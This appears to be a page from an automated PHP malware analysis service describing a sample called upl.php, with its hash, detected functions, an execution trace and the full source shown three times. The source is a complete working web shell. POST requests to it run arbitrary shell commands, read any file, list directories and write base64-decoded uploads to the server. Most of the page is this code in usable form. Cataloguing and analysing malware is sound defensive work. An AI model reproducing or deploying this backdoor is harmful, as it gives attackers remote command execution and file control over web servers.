upl.php

md5: 7f904e8caca64148c6dd51ba21d0d692

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Encoding
base64_decode (Deobfuscated, HTML, Original)

Execution
shell_exec (Deobfuscated, HTML, Original)

Files
file_get_contents (Deobfuscated, HTML, Original)
file_put_contents (Deobfuscated, HTML, Original)

Input
_POST (Deobfuscated, HTML, Original)

Deobfuscated PHP code
function echo_json($data=[]) { echo json_encode( $data ); } if( !empty( $_POST['cmd'] ) ){ if( $_POST['cmd'] == "test" ){ echo_json([ "code" => 200, ]); } if( $_POST['cmd'] == "get_file_data" ){ $data = file_get_contents( __DIR__ . '/' . $_POST['file'] ); echo_json([ "code" => 200, "data" => $data, ]); } if( $_POST['cmd'] == "get_files" ){ $struct = []; $files = scandir( __DIR__ ); foreach ($files as $file) { if( $file == '.' || $file == '..' ){ continue; } if( is_dir( __DIR__ . '/' . $file ) ){ $sub_files = scandir( __DIR__ . '/' . $file ); $struct[] = [ "file" => $file, "type" => "d", "sub_files" => $sub_files, ]; }else{ $struct[] = [ "file" => $file, "type" => "f", ]; } } echo_json([ "code" => 200, "struct" => $struct, ]); } if( $_POST['cmd'] == "get_dir" ){ echo_json([ "code" => 200, "dir" => __DIR__, ]); } if( $_POST['cmd'] == "shell_exec" ){ shell_exec( $_POST['command'] ); echo_json([ "code" => 200, ]); } if( $_POST['cmd'] == "mkdir" ){ mkdir( $_POST['dir'] ); chmod( $_POST['dir'] , 0755 ); echo_json([ "code" => 200, ]); } if( $_POST['cmd'] == "upload" ){ file_put_contents( $_POST['file'] , base64_decode( $_POST['data'] ) ); chmod( $_POST['file'] , 0644 ); echo_json([ "code" => 200, ]); } }
Execution traces
data/traces/7f904e8caca64148c6dd51ba21d0d692_trace-1676242538.4633.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:56:04.361108]
1	0	1	0.000154	393512
1	3	0	0.000195	394312	{main}	1		/var/www/html/uploads/upl.php	0	0
1	3	1	0.000212	394312
			0.000237	314224
TRACE END   [2023-02-12 20:56:04.361222]

Generated HTML code
<html><head></head><body>function echo_json($data=[]) { echo json_encode( $data ); } if( !empty( $_POST['cmd'] ) ){ if( $_POST['cmd'] == "test" ){ echo_json([ "code" =&gt; 200, ]); } if( $_POST['cmd'] == "get_file_data" ){ $data = file_get_contents( __DIR__ . '/' . $_POST['file'] ); echo_json([ "code" =&gt; 200, "data" =&gt; $data, ]); } if( $_POST['cmd'] == "get_files" ){ $struct = []; $files = scandir( __DIR__ ); foreach ($files as $file) { if( $file == '.' || $file == '..' ){ continue; } if( is_dir( __DIR__ . '/' . $file ) ){ $sub_files = scandir( __DIR__ . '/' . $file ); $struct[] = [ "file" =&gt; $file, "type" =&gt; "d", "sub_files" =&gt; $sub_files, ]; }else{ $struct[] = [ "file" =&gt; $file, "type" =&gt; "f", ]; } } echo_json([ "code" =&gt; 200, "struct" =&gt; $struct, ]); } if( $_POST['cmd'] == "get_dir" ){ echo_json([ "code" =&gt; 200, "dir" =&gt; __DIR__, ]); } if( $_POST['cmd'] == "shell_exec" ){ shell_exec( $_POST['command'] ); echo_json([ "code" =&gt; 200, ]); } if( $_POST['cmd'] == "mkdir" ){ mkdir( $_POST['dir'] ); chmod( $_POST['dir'] , 0755 ); echo_json([ "code" =&gt; 200, ]); } if( $_POST['cmd'] == "upload" ){ file_put_contents( $_POST['file'] , base64_decode( $_POST['data'] ) ); chmod( $_POST['file'] , 0644 ); echo_json([ "code" =&gt; 200, ]); } }</body></html>
Original PHP code
function echo_json($data=[]) { echo json_encode( $data ); } if( !empty( $_POST['cmd'] ) ){ if( $_POST['cmd'] == "test" ){ echo_json([ "code" => 200, ]); } if( $_POST['cmd'] == "get_file_data" ){ $data = file_get_contents( __DIR__ . '/' . $_POST['file'] ); echo_json([ "code" => 200, "data" => $data, ]); } if( $_POST['cmd'] == "get_files" ){ $struct = []; $files = scandir( __DIR__ ); foreach ($files as $file) { if( $file == '.' || $file == '..' ){ continue; } if( is_dir( __DIR__ . '/' . $file ) ){ $sub_files = scandir( __DIR__ . '/' . $file ); $struct[] = [ "file" => $file, "type" => "d", "sub_files" => $sub_files, ]; }else{ $struct[] = [ "file" => $file, "type" => "f", ]; } } echo_json([ "code" => 200, "struct" => $struct, ]); } if( $_POST['cmd'] == "get_dir" ){ echo_json([ "code" => 200, "dir" => __DIR__, ]); } if( $_POST['cmd'] == "shell_exec" ){ shell_exec( $_POST['command'] ); echo_json([ "code" => 200, ]); } if( $_POST['cmd'] == "mkdir" ){ mkdir( $_POST['dir'] ); chmod( $_POST['dir'] , 0755 ); echo_json([ "code" => 200, ]); } if( $_POST['cmd'] == "upload" ){ file_put_contents( $_POST['file'] , base64_decode( $_POST['data'] ) ); chmod( $_POST['file'] , 0644 ); echo_json([ "code" => 200, ]); } }
PHP Malware Analysis

upl.php

md5: 7f904e8caca64148c6dd51ba21d0d692

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
